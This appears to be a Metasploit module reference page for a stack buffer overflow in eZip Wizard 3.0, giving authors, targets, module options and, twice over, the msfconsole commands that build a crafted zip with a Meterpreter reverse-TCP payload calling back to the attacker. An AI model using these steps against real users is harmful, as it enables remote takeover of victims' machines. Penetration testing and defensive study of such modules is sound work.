eZip Wizard 3.0 Stack Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in version 3.0 of ediSys Corp.'s eZip Wizard. In order for the command to be executed, an attacker must convince someone to open a specially crafted zip file with eZip Wizard, and access the specially file via double-clicking it. By doing so, an attacker can execute arbitrary code as the victim user.
Exploit Rank
- Good
Exploit Authors
- fl0 fl0w < >
- jduck < jduck [at] metasploit.com >
- Lincoln < >
Vulnerability References
Exploit Targets
- 0 - Windows Universal (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/ezip_wizard_bof
msf exploit(ezip_wizard_bof) > show payloads
msf exploit(ezip_wizard_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ezip_wizard_bof) > set LHOST [MY IP ADDRESS]
msf exploit(ezip_wizard_bof) > set USERNAME [STRING]
msf exploit(ezip_wizard_bof) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/ezip_wizard_bof
msf exploit(ezip_wizard_bof) > show payloads
msf exploit(ezip_wizard_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ezip_wizard_bof) > set LHOST [MY IP ADDRESS]
msf exploit(ezip_wizard_bof) > set USERNAME [STRING]
msf exploit(ezip_wizard_bof) > exploit
Exploit Module Options
| FILENAME | The output file name. (default: msf.zip) |
| USERNAME | Username (default: ) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
